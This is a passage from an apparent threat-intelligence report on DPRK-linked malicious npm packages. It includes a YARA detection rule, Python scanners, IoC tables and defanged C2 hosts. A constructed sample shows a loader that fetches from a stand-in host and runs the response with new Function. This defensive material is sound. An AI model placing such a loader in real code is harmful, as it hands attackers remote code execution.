    meta:
        description = "HTTP response body passed to Function constructor or eval — remote code loader pattern"
        author = "PantherLabs"
        date = "2026-04-16"
        severity = "high"
        campaign = "DPRK / Contagious Trader / OtterCookie"

    strings:
        // HTTP-fetch idioms — any one of these
        $http_axios_get   = /await\s+axios\s*\.\s*(get|post|put|patch|request)\s*\(/
        $http_axios_call  = /await\s+axios\s*\(/
        $http_fetch       = /await\s+fetch\s*\(/
        $http_got         = /await\s+got\s*(\.\s*\w+\s*)?\(/
        $http_node        = /(https?|http2)\s*\.\s*(get|request)\s*\(/

        // Dynamic-execution idioms — any one of these
        $dyn_function     = /new\s+Function\s*\(/
        $dyn_fn_ctor      = /new\s+Function\s*\.\s*constructor\s*\(/
        $dyn_eval         = /\beval\s*\(/
        $dyn_vmrun        = /\bvm\s*\.\s*runIn(This|New)Context\s*\(/
        $dyn_vmscript     = /new\s+vm\s*\.\s*Script\s*\(/

        // Reading a `data` or `body` field off something
        // (the link between the HTTP response and the exec call)
        $field_extract    = /\.\s*data\s*[\.\[]/
        $field_optchain   = /\.\s*data\s*\?\s*\./
        $field_body       = /\.\s*body\s*[\.\[]/

    condition:
        filesize < 200KB
        and 1 of ($http_*)
        and 1 of ($dyn_*)
        and 1 of ($field_*)
}
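
The rule above matches per file, so it has to be run over every module in node_modules, not just the package a developer is reviewing, because the loader in this campaign lives one to three dependency hops below the visible code. The following Python is an added example written for this page, not Panther's scanner and not code from any of the packages discussed: it mirrors the rule's three string groups as regexes, applies them to an in-memory dependency tree, and reports the hop depth of each hit. The package names, file contents and the example.invalid host in SAMPLE_TREE are constructed for the demonstration; load_tree() is the only part that touches disk.

```python
import os
import re
from typing import Dict, List, Tuple

# Regexes mirroring the three string groups of NPM_Remote_Code_Loader_HTTP_To_Function.
HTTP_FETCH = [re.compile(p) for p in (
    r"await\s+axios\s*\.\s*(get|post|put|patch|request)\s*\(",
    r"await\s+axios\s*\(",
    r"await\s+fetch\s*\(",
    r"await\s+got\s*(\.\s*\w+\s*)?\(",
    r"(https?|http2)\s*\.\s*(get|request)\s*\(",
)]
DYN_EXEC = [re.compile(p) for p in (
    r"new\s+Function\s*\(",
    r"new\s+Function\s*\.\s*constructor\s*\(",
    r"\beval\s*\(",
    r"\bvm\s*\.\s*runIn(This|New)Context\s*\(",
    r"new\s+vm\s*\.\s*Script\s*\(",
)]
FIELD_EXTRACT = [re.compile(p) for p in (
    r"\.\s*data\s*[\.\[]",
    r"\.\s*data\s*\?\s*\.",
    r"\.\s*body\s*[\.\[]",
)]
MAX_SIZE = 200 * 1024  # the rule's "filesize < 200KB" guard, on UTF-8 byte length


def matches_rule(source: str) -> bool:
    """True when at least one pattern from each of the three groups appears in the file."""
    if len(source.encode("utf-8")) >= MAX_SIZE:
        return False
    return (any(p.search(source) for p in HTTP_FETCH)
            and any(p.search(source) for p in DYN_EXEC)
            and any(p.search(source) for p in FIELD_EXTRACT))


def dependency_depth(rel_path: str) -> int:
    """0 = project code, 1 = direct dependency, 2+ = transitive dependency."""
    return rel_path.split("/").count("node_modules")


def scan_tree(files: Dict[str, str]) -> List[Tuple[str, int]]:
    """Apply the rule to a {relative_path: source} map; return sorted (path, depth) hits."""
    return sorted((path, dependency_depth(path))
                  for path, src in files.items() if matches_rule(src))


def load_tree(root: str) -> Dict[str, str]:
    """Read every .js/.mjs/.cjs file under root, node_modules included, into memory."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith((".js", ".mjs", ".cjs")):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    files[rel] = fh.read()
    return files


# Constructed sample tree: hypothetical package names and hosts, not real samples.
# The loader sits two hops down; the root and the direct dependency look clean.
SAMPLE_TREE = {
    "index.js": "const { start } = require('trading-core');\nstart();\n",
    "node_modules/trading-core/index.js":
        "const helper = require('pretty-helper');\n"
        "module.exports.start = () => helper.init();\n",
    "node_modules/trading-core/node_modules/pretty-helper/index.js":
        "const axios = require('axios');\n"
        "module.exports.init = async () => {\n"
        "  const r = await axios.get('https://example.invalid/api/validate/x');\n"
        "  new Function(r.data.payload)();\n"
        "};\n",
    # Benign: fetches JSON and reads a field, but never executes it
    "node_modules/price-feed/index.js":
        "module.exports = async () => {\n"
        "  const r = await fetch('https://example.invalid/prices');\n"
        "  const j = await r.json();\n"
        "  return j.data.price;\n"
        "};\n",
}

if __name__ == "__main__":
    for path, depth in scan_tree(SAMPLE_TREE):
        print(f"HIT depth={depth} {path}")
```

Running it against SAMPLE_TREE reports only the pretty-helper module at depth 2; price-feed fetches and reads `.data` but has no dynamic-execution idiom, so it does not match. The same limitation applies to the YARA rule itself: it cannot tie a fetch in one module to an eval in another, so a loader split across two files in a dependency chain needs a second, cross-file check.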



IoCs

Hashes

| SHA256 | Name | Note |
|---|---|---|
| 7465382403e61ba1e96a6b9b700cb7d06a2cf802f7079ff0a7f859d751adc45a | prettier-resolver-1.1.5.tgz | npm tarball (kunwarshivam1971) |
| 9988632cd76dcb448e673daf6b97e78225fe0613fe4268b971cbd5bd29b0ba8b | cdll.mjs | ClipViper sample |
| a08c089ed46447cd901bbd9031f1931337afe42bb8af70299195d5f9b11c69fb | cdll-run-hidden.vbs | VBScript launcher |
| 36abee6d79f8b135d1b03540dcbde1fb2eb1abba7ea5bf59ecb342730c415519 | cdll.xml | Task Scheduler XML definition |
| d00aa3cbd7ad80b72cc5df665a7377c72981ba116b486e6c34b81896be0e4124 | ctll.mjs | ClipViper dropper |


DPRK-attributed NPM Malicious Packages

| Package | Version(s) | npm Account | Email | Cluster |
|---|---|---|---|---|
| api-node-utils | 2.2.4 | ffffrakyevin | frankykevin.dev[@]gmail[.]com | PromptMink |
| api-ts-utils | 1.0.0-2.1.4 | ffffrakyevin | frankykevin.dev[@]gmail[.]com | ClipViper |
| api-ts-utils | 3.x (3.4.9, 3.5.9) | ffffrakyevin | frankykevin.dev[@]gmail[.]com | PromptMink |
| typescript-util-core | 3.5.0-7.1.6 | ffffrakyevin | frankykevin.dev[@]gmail[.]com | PromptMink |
| prettier-resolver | 1.1.5-1.2.2 | kunwarshivam1971 | kunwarshivam1971[@]hotmail[.]com | ClipViper |
| web-http-errors | 1.3.3, 4.5.1 | kunwarshivam1971 | kunwarshivam1971[@]hotmail[.]com | ClipViper |
| http-errors-cli | 1.3.1 | kunwarshivam1971 | kunwarshivam1971[@]hotmail[.]com | ClipViper |
| bn-eslint.js | 8.0.5 | amauri_jesus | cashblaze1001[@]gmail[.]com | PromptMink |
| npm-eslint-helper | 1.0.1 | amauri_jesus | cashblaze1001[@]gmail[.]com | PromptMink |
| classnames-sub-folk | 1.0.0, 3.5.2 | danlo00holoden | cashblaze0510[@]gmail[.]com | ClipViper |
| result-type-tool | 2.8.3 | danlo00holoden | cashblaze0510[@]gmail[.]com | ClipViper (depends on classnames-sub-folk) |
| prettier-logger | 0.1.5-0.1.6 | aleksislabs | aleksis2026dev[@]outlook[.]com | PromptMink |
| polymarket-onchain-sdk | 1.0.3-1.0.4 | aleksislabs | aleksis2026dev[@]outlook[.]com | PromptMink |
| polymarket-onchain-plugin | 2.1.4 | maklionelox | maklionelox[@]gmail[.]com | PromptMink |
| picocolor-logger | 1.0.0-1.0.2 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| sleek-pretty | 1.0.0 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| pinky-logger | 1.0.0 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| chalks-logger | 1.1.0-1.1.3 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| chalk-pro-logger | 1.1.1-1.1.2 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| emojiprint-logger | 1.1.0 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| chalki-pretty | 1.0.0 | lorine93s | milosk920125[@]gmail[.]com | PromptMink |
| styled-text-logger | 1.3.1 | npmpodev0707 | diwatkins1971k[@]gmail[.]com | PromptMink |
| color-logger-console | 3.1.8-3.1.9 | devking1616 | podev75926[@]gmail[.]com | PromptMink |
| lint-builder-logger | 1.0.4 | alberto1114 | super1114dev[@]gmail[.]com | OtterCookie |
| ts-big-lib | 1.3.4 | alberto1114 | super1114dev[@]gmail[.]com | OtterCookie |
| levex-press | 1.0.5 | alberto1114 | super1114dev[@]gmail[.]com | OtterCookie |
| awesome-cli-builders | 1.0.0 | jofarc | jofarc789[@]gmail[.]com | OtterCookie |
| awesome-cli-logger | 1.0.0 | jofarc | jofarc789[@]gmail[.]com | OtterCookie |
| rjs-biginteger | 2.0.1 | jofarc | jofarc789[@]gmail[.]com | PromptMink |
| npm-doc-dev | 1.0.4-1.1.1 | rafinhossian | rafinhossianlove[@]gmail[.]com | PromptMink |
| big256-ts | 5.0.4 | rafinhossian | rafinhossianlove[@]gmail[.]com | PromptMink |
| ts-relayer-pub | 1.0.0 | y.rix.elfi.e.co | y.rix.elfi.e.co[@]gmail[.]com | PromptMink |
| npm-builders | 1.0.8 | digoschristiann | di.gos.c.hristia.n.n[@]googlemail[.]com | OtterCookie |
| ts-lint-builder | 1.0.8-1.0.9 | digoschristiann | di.gos.c.hristia.n.n[@]googlemail[.]com | OtterCookie |
| ts-lint-builds | 1.0.5 | ca.r.lane.es1.2.6 | ca.r.lane.es1.2.6[@]googlemail[.]com | OtterCookie |
| npm-doc-builder | 1.0.7 | al.lanjaysa.t.i.a.gi | al.lanjaysa.t.i.a.gi[@]gmail[.]com | OtterCookie |
| pino-pretty-logger | 1.0.8 | soju_dev | haraldosman.ho[@]gmail[.]com | PromptMink |
| logger-beauty | 2.1.1 | cryptopawsol | cryptopawsol[@]gmail[.]com | PromptMink |
| ts-moduler | 1.0.5 | moduler | cobily11[@]gmail[.]com | PromptMink |
| ts-logger-pack | 1.1.2 | jpeek886 | jpeek886[@]gmail[.]com | PromptMink |
| terminal-logger-pack | 0.1.0-1.1.1 | jpeek895 | jpeek895[@]gmail[.]com | PromptMink |
| pino-utils | 1.4.0 | satyasu8 | satyasumn8[@]gmail[.]com | PromptMink (SSH key = npmpodev0707) |
| @tsjunk/chalk | 5.6.2 | mod_triler | N/A | PromptMink |
| @etherprojects/logger | 5.8.1 | michale127 | N/A | PromptMink |
| changelog-utils-wrapper | 1.0.0 | chirag_nikolic | chiragnikolic[@]gmail[.]com | PromptMink (ReversingLabs) |
| ts-bing | 1.3.1 | v.al.s.o.lo.mon7.0 | v.al.s.o.lo.mon7.0[@]gmail[.]com | PromptMink (C2 = y.rix.elfi.e.co) |
| vime-azl | 1.1.4 | v.al.s.o.lo.mon7.0 | v.al.s.o.lo.mon7.0[@]gmail[.]com | PromptMink (payload for ts-bing) |
| ts-utils-dev | 1.3.2 | jamesjamesjmaes123 | al.la.n.h.o.rca07[@]gmail[.]com | PromptMink (big.js typosquat) |
| gleb-js | 1.2.0 | jamesjamesjmaes123 | al.la.n.h.o.rca07[@]gmail[.]com | PromptMink (payload for ts-utils-dev) |
| bigint.os | 5.0.5 | a.yal.a.da.ve7 | a.yal.a.da.ve7[@]gmail[.]com | OtterCookie (big.js typosquat) |
| lint-null | 1.0.4 | a.yal.a.da.ve7 | a.yal.a.da.ve7[@]gmail[.]com | OtterCookie (payload for bigint.os) |
| mjs-biginteger | 5.0.5 | n.ar.a.tat.ia.n.aaa | n.ar.a.tat.ia.n.aaa[@]gmail[.]com | OtterCookie (big-integer typosquat) |
| ts-lint-builders | 1.0.5 | n.ar.a.tat.ia.n.aaa | n.ar.a.tat.ia.n.aaa[@]gmail[.]com | OtterCookie (payload for mjs-biginteger) |
| st-bigintr | 5.0.6 | a.n.n.as.ibal2.36 | a.n.n.as.ibal2.36[@]googlemail[.]com | OtterCookie (paired with sjs-builder; payload hash bcfb01ee... shared with mjs-biginteger + cjs-biginteger) |
| cjs-biginteger | 5.0.3-5.0.5 | ca.r.lane.es1.2.6 | ca.r.lane.es1.2.6[@]googlemail[.]com | OtterCookie (payload hash bcfb01ee... shared with st-bigintr + mjs-biginteger) |
| sjs-builders | 1.0.4 | ayal.a.d.av.e.7 | ayal.a.d.av.e.7[@]gmail[.]com | OtterCookie (dotted-name actor, near-identical username to a.yal.a.da.ve7) |
| st-biginteger | 5.0.5 | ayal.a.d.av.e.7 | ayal.a.d.av.e.7[@]gmail[.]com | OtterCookie (big-integer typosquat, not in prior reporting) |
| bjs-lint-builders | 1.0.4 | a.l.l.a.nh.orca0.7 | a.l.l.a.nh.orca0.7[@]googlemail[.]com | OtterCookie |
| sjs-builder | 1.0.4 | a.n.n.as.ibal2.36 | a.n.n.as.ibal2.36[@]googlemail[.]com | OtterCookie |
| pretty-fancy | 1.0.0-1.0.5 | npm_kei | N/A | PromptMink |
| pretty-pino-logger | 1.0.0-2.0.2 | npm_kei | N/A | PromptMink |
| js-tree-integer | 1.0.0, 2.6.3, 2.6.7 | amauri_jesus | cashblaze1001[@]gmail[.]com | OtterCookie |
| js-integer-log | 1.0.0, 3.6.1 | amauri_jesus | cashblaze1001[@]gmail[.]com | OtterCookie |
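
The package table is most useful when it is checked against a project's lockfile rather than its package.json, because the lockfile records the transitive dependencies where these packages actually sit (result-type-tool pulling in classnames-sub-folk is the example above). The following Python is an added example written for this page, not Panther's tooling: it walks the `packages` map of a package-lock.json (lockfileVersion 2 or 3 is assumed), reports every installed package whose name is in the list along with its dependency depth, and distinguishes a version that falls inside the table's listed range from a name-only match. BLOCKLIST is a hand-transcribed subset of the table (the entry "3.x (3.4.9, 3.5.9)" is expanded to the two listed versions); SAMPLE_LOCK is a constructed lockfile, not one taken from any of the repositories listed.

```python
import json
from typing import Dict, Iterable, List, Optional, Tuple

# Subset of the package table above, transcribed for this example. Specs follow the
# "Version(s)" column: "a-b" is an inclusive range, everything else is an exact version.
BLOCKLIST: Dict[str, List[str]] = {
    "api-ts-utils": ["1.0.0-2.1.4", "3.4.9", "3.5.9"],
    "typescript-util-core": ["3.5.0-7.1.6"],
    "prettier-resolver": ["1.1.5-1.2.2"],
    "web-http-errors": ["1.3.3", "4.5.1"],
    "classnames-sub-folk": ["1.0.0", "3.5.2"],
    "result-type-tool": ["2.8.3"],
    "bn-eslint.js": ["8.0.5"],
    "@tsjunk/chalk": ["5.6.2"],
    "mjs-biginteger": ["5.0.5"],
}


def parse_version(v: str) -> Optional[Tuple[int, ...]]:
    """Numeric core of a version ("1.2.3-beta+build" -> (1, 2, 3)); None if unparsable."""
    core = v.split("+", 1)[0].split("-", 1)[0]
    try:
        return tuple(int(x) for x in core.split("."))
    except ValueError:
        return None


def version_in_spec(version: str, spec: str) -> bool:
    """Does an installed version fall inside one spec from the table?"""
    v = parse_version(version)
    if v is None:
        return False
    if "-" in spec:                       # inclusive range "lo-hi" as written in the table
        lo, hi = spec.split("-", 1)
        return parse_version(lo) <= v <= parse_version(hi)
    return v == parse_version(spec)


def iter_installed(lock: dict) -> Iterable[Tuple[str, str, int]]:
    """Yield (name, version, depth) for every entry of a lockfileVersion 2/3 'packages' map."""
    for path, meta in lock.get("packages", {}).items():
        if not path:                      # "" is the root project itself
            continue
        name = path.rsplit("node_modules/", 1)[-1]   # keeps an @scope/ prefix intact
        depth = path.count("node_modules/")          # 1 = direct dep, 2+ = transitive
        yield name, meta.get("version", ""), depth


def find_blocked(lock: dict) -> List[dict]:
    """Every installed package whose name is in BLOCKLIST, with how strongly it matched."""
    hits = []
    for name, version, depth in iter_installed(lock):
        specs = BLOCKLIST.get(name)
        if specs is None:
            continue
        exact = any(version_in_spec(version, s) for s in specs)
        hits.append({"name": name, "version": version, "depth": depth,
                     "match": "version" if exact else "name-only"})
    return hits


def find_blocked_in_file(path: str) -> List[dict]:
    with open(path, "r", encoding="utf-8") as fh:
        return find_blocked(json.load(fh))


# Constructed lockfile for the demonstration: one clean dependency, one ClipViper
# dependency chain two hops deep, one PromptMink package inside a listed range, and
# one listed package at a version the table does not mention.
SAMPLE_LOCK = json.loads("""
{
  "name": "polymarket-bot-example", "lockfileVersion": 3,
  "packages": {
    "": {"name": "polymarket-bot-example", "version": "1.0.0"},
    "node_modules/axios": {"version": "1.6.0"},
    "node_modules/result-type-tool": {"version": "2.8.3"},
    "node_modules/result-type-tool/node_modules/classnames-sub-folk": {"version": "3.5.2"},
    "node_modules/api-ts-utils": {"version": "2.0.1"},
    "node_modules/@tsjunk/chalk": {"version": "5.6.3"}
  }
}
""")

if __name__ == "__main__":
    for h in find_blocked(SAMPLE_LOCK):
        print(f"{h['match']:9s} depth={h['depth']} {h['name']}@{h['version']}")
```

The name-only result for @tsjunk/chalk@5.6.3 is deliberate: these packages have no legitimate versions, so a name match is already actionable and the version check only tells you which family the table associates with that release.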


DPRK-attributed GitHub Repos

| Repo | GitHub User/Org | Theme | Malicious import | Cluster |
|---|---|---|---|---|
| /polymarket-trading-bot | CashBlazorLab | Polymarket | bn-eslint.js + web-http-errors | PromptMink + ClipViper |
| /polymarket-trading-bot | XHYhappy | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-copy-trading-bot | XHYhappy | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-ai-trading-bot | XHYhappy | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-kalshi-arbitrage-bot-15min-market | XHYhappy | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-copy-trading-bot | Symotix | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-kalshi-arbitrage-bot-15min-market | syahrayhan | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-kalshi-arbitrage-bot-15min-market | Krypto-Hashers-Community | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-arbitrage-trading-bot | legit-script-group | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-arbitrage-bot | polkadot-org | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-ai-trading-bot | polkadot-org | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-finance-bot | polkadot-org | Polymarket | bn-eslint.js | PromptMink |
| /polymarket-politics-bot | polkadot-org | Polymarket | bn-eslint.js | PromptMink |
| /pancakeswap-prediction-bot | madewithai | PancakeSwap | bn-eslint.js | PromptMink |
| /pumpfun-mayhem-trading-bot | gigi0500 | PumpFun | bn-eslint.js | PromptMink |
| /pumpfun-mayhem-ai-trading-bot | gigi0500 | PumpFun | bn-eslint.js | PromptMink |
| /pumpfun-mayhem-copy-trading-bot | gigi0500 | PumpFun | bn-eslint.js | PromptMink |
| /pumpfun-mayhem-volume-bot | gigi0500 | PumpFun | bn-eslint.js | PromptMink |
| /pumpfun-mayhem-bundler-bot | gigi0500 | PumpFun | bn-eslint.js | PromptMink |
| /pumpfun-mayhem-migration-sniper | gigi0500 | PumpFun | bn-eslint.js | PromptMink |
| /Polymarket-Arbitrage-Crypto-Trading-Bot-V3 | 0xFives | Polymarket | polymarket-onchain-sdk | PromptMink |
| /Pumpfun-Volume-Bot | 0xFives | PumpFun | prettier-logger | PromptMink |
| /Raydium-Cpmm-Sniper | 0xFives | Solana | prettier-logger | PromptMink |
| /openclaw-ai-polymarket-trading-bot | solcanine | Polymarket | logger-beauty | PromptMink |
| /polymarket-impulse-monitoring-trading-bot | solcanine | Polymarket | logger-beauty | PromptMink |
| /Polymarket-Sports-Bot | GastonDeMichele | Polymarket | color-logger-console | PromptMink |
| /Polymarket-Copytrading-Bot | PoDev-rahulrajasekhar | Polymarket | color-logger-console | PromptMink |
| /polymarket-copy-trade-bot | djosk23 | Polymarket | bigint.os + sjs-builder | OtterCookie |
| /polymarket-trading-bot-example | LacaveSeb | Polymarket | mjs-biginteger | OtterCookie |
| /chain-fetcher-hub | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /system-lab-5857 | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /data-services | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /stack-runtime | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /infra-pipeline-lab | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /sync-batch-lab-5312 | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /hub-suite | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /gateway-stack-5812 | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /system-runtime | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /sync-core | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /service-core | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /stack-system | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /engine-core | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /bridge-core | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /index-lab | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /flux-kit | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /prime-services | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /data-pipeline-system-4275 | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /sync-stack | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /prime-core | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /data-stream-lab-1839 | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /meta-runtime-lab | Chain-Ether-Core | Polymarket | web-http-errors | ClipViper |
| /flux-relay-stack | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /core-hub-stack | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /infra-service-system | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /worker-hub-2619 | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /core-lab-7000 | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /runtime-kit | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /pipeline-system | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /fetcher-core | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /flux-batch-stack | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /system-hub-core-536 | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /index-services-2599 | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /dev-platform-4287 | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /infra-index-kit | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /stack-fetcher-lab | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /relay-suite | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /prime-pipeline-system-8633 | Infranova-Labs | Polymarket | web-http-errors | ClipViper |
| /prime-suite | Cryptonerva | Polymarket | web-http-errors | ClipViper |
| /system-services | Cryptonerva | Polymarket | web-http-errors | ClipViper |
| /polymarket-arbitrage | amplify-protocol | Polymarket | api-ts-utils | PromptMink |
| /polymarket-arbitrage | TQ-trade | Polymarket | api-ts-utils | PromptMink |
| /polymarket-copy-trading-bot | Predictional-Infra | Polymarket | big256-ts | PromptMink |
| /polymarket-trading-bot | tradebothub | Polymarket | ts-moduler | PromptMink |
| /polymarket-copy-trading-bot | G3-DEV-AGENCY | Polymarket | ts-big-lib | OtterCookie |
| /polymarket-copytrading-bot | G3-DEV-AGENCY | Polymarket | ts-big-lib | OtterCookie |
| /polymarket-arbitrage-bot | zkOSAI | Polymarket | ts-big-lib | OtterCookie |
| /polymarket-trading-bot | soldrift | Polymarket | ts-logger-pack | PromptMink |
| /polymarket-copy-trading-bot | Valentioo | Polymarket | ts-logger-pack | PromptMink |
| /Sol-marketplace | machenxi | Solana | chalks-logger | PromptMink |
| /Polymarket-Trading-Bot-Gabagool | satyasumn7 | Polymarket | pino-utils | PromptMink |
| /polymarket-sports-betting-bot | AlgoInfraTech | Polymarket | sleek-pretty | PromptMink |
| /polymarket-trading-bot | AlgoInfraTech | Polymarket | @tsjunk/chalk | PromptMink |
| /polymarket-trading-bot-copytrading | ScouterInfinite | Polymarket | @etherprojects/logger | PromptMink |
| /Polymarket-Arbitrage-Crypto-Trading-Bot | emmarktech | Polymarket | polymarket-onchain-plugin | PromptMink |
| /1776507753199 | alpaca-project | Polymarket | ts-bing | PromptMink |
| /evm-arbitrage-bot | BNB-Alpha-Community | EVM | ts-bing | PromptMink |
| /polymarket-trading-bot | alexandrosmagos | Polymarket | ts-utils-dev | PromptMink |
| /polymarket-btc-5min-15min-arbitrage-bot | lorine93s | Polymarket | chalks-logger, emojiprint-logger | PromptMink |
| /polymarket-copy-trading-bot | lorine93s | Polymarket | chalks-logger | PromptMink |
| /Pumpfun_AI_Trading_Bot | Jackhuang166 | PumpFun | chalks-logger | PromptMink |
| /hyberliquid-arbitrage-bot | Jackhuang166 | Hyperliquid | chalks-logger | PromptMink |
| /Ethical-GenAI-Framework | praneethreddyy14 | Polymarket | bn-eslint.js | PromptMink |
| /Polymarket-Arbitrage-Trading-Bot | Matias123p | Polymarket | changelog-utils-wrapper | PromptMink |
| /polymarket-arbitrage-trading-bot | Runtime-Trade-Systems | Polymarket | @tsjunk/chalk | PromptMink |
| /polymarket-copy-trading-bot | benja-dev-lab | Polymarket | @tsjunk/chalk | PromptMink |
| /polymarket-btc-5min-15min-arbitrage-trading-bot | lorine93s | Polymarket | emojiprint-logger | PromptMink |
| /Polymarket-Arbitrage-Crypto-Trading-Bot | AdrianNavaG | Polymarket | polymarket-onchain-sdk | PromptMink |
| /Polymarket-Arbitrage-Trading-Bot-Spreadmaker | Corettafinnougricspeaking368 | Polymarket | pretty-fancy | PromptMink |
| /polymarket-copytrade | mclaeo | Polymarket | api-ts-utils | PromptMink |
| /polymarket-arbitrage | mclaeo | Polymarket | api-ts-utils | PromptMink |
| /polymarket-copytrade | rybirdwell | Polymarket | api-ts-utils | PromptMink |
| /polymarketarbitrage | rybirdwell | Polymarket | api-ts-utils | PromptMink |
| /polymarket-copytrade | Dougthethugg | Polymarket | api-ts-utils | PromptMink |
| /polymarketarbitrage | Dougthethugg | Polymarket | api-ts-utils | PromptMink |
| /polymarket-copytrade | gisel69 | Polymarket | api-ts-utils | PromptMink |
| /polymarketarbitrage | gisel69 | Polymarket | api-ts-utils | PromptMink |
| /polymarket-copytrade | kyyook | Polymarket | api-ts-utils | PromptMink |
| /polymarketarbitrage | kyyook | Polymarket | api-ts-utils | PromptMink |
| /polymarket-arbitrage-bot | JoTalksdxb | Polymarket | cjs-biginteger | OtterCookie |
| /polymarket-arbitrage/ | JeanDupuis68 | Polymarket | api-ts-utils | PromptMink |
| /polymarket-copytrade | JeanDupuis68 | Polymarket | api-ts-utils | PromptMink |
| /prediction-market-copytrade | SXai-lab | Polymarket | api-ts-utils | PromptMink |
| /prediction-market-arbitrage | SXai-lab | Polymarket | api-ts-utils | PromptMink |

C2 Infrastructure

| C2 | Actor | Notes |
|---|---|---|
| nonce-link[.]vercel[.]app | ffffrakyevin, kunwarshivam1971, danlo00holoden | Shared clipboard stealer C2 |
| mono-link[.]vercel[.]app | ffffrakyevin | api-ts-utils v1-2.1.3 |
| polymarkettrading[.]vercel[.]app | ffffrakyevin | KMSec confirmed, api-node-utils |
| eslint-helper[.]vercel[.]app | amauri_jesus | File exfil C2 for npm-eslint-helper (confirmed from source) |
| eslint-config[.]vercel[.]app | amauri_jesus | Possible C2 rotation or alternate endpoint |
| 170.205.31[.]203 | ffffrakyevin | AS206216 Advin Services LLC, typescript-util-core |
| api.fivefingerz[.]dev | aleksislabs | prettier-logger SSH backdoor + infostealer |
| polymarket-clob2[.]blog | lorine93s | Primary C2, A/B rotated with Vercel backend |
| polymarket-bots-backend[.]vercel[.]app | lorine93s | KMSec watchlist |
| api.mywalletsss[.]store | lorine93s | OTX confirmed DPRK / Contagious Trader |
| clob-polymarket[.]com | npmpodev0707 | OTX confirmed DPRK / Contagious Trader |
| color-picker[.]live | devking1616 | KMSec confirmed, socket.io transport |
| cloudflareinsights[.]vercel[.]app | alberto1114, digoschristiann, al.lanjaysa.t.i.a.gi | OtterCookie C2. SSH key + scan-pattern config server. See the OtterCookie report for full infrastructure mapping. |
| wallet-management-tg-bot[.]vercel[.]app | alberto1114 | OtterCookie C2. lint-builder-logger from_str_1() file exfil |
| 208.84.100[.]22 | alberto1114 | OtterCookie bare-IP C2. levex-press v1.0.5, ports 3000 (exfil) / 3001 (config + SSH key). Same /api/v1, /api/ssh-key, /api/scan-patterns, /api/block-patterns endpoint structure as the Vercel C2. |
| polybot-management-v1[.]vercel[.]app | jofarc | awesome-cli-builders, published 2026-05-05 |
| polybot-management-v2[.]vercel[.]app | jofarc | awesome-cli-builders, published 2026-05-05 |
| polymarket-api-v2[.]vercel[.]app | rafinhossian | npm-doc-dev file exfil |
| polymarket-cli-v2[.]vercel[.]app | rafinhossian | npm-doc-dev SSH key fetch |
| cloudflare-protection[.]vercel[.]app | y.rix.elfi.e.co | ts-relayer-pub, new actor |
| clob[.]0xundying[.]dev | soju_dev | pino-pretty-logger, new actor |
| api.devnet.solana[.]com | a.n.n.as.ibal2.36 | Solana devnet API abused as C2 staging/exfil. OtterCookie cluster. |
| https[:]//huggingface[.]co/Lordplay/system-releases/resolve/main/ | jpeek895 | PromptMink cluster |
| https[:]//logger[.]clob[.]health | npm_kei | PromptMink cluster |
| blxrbn[.]com | npm_kei | PromptMink cluster |
| 204[.]10[.]194[.]64 | amauri_jesus | OtterCookie |
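
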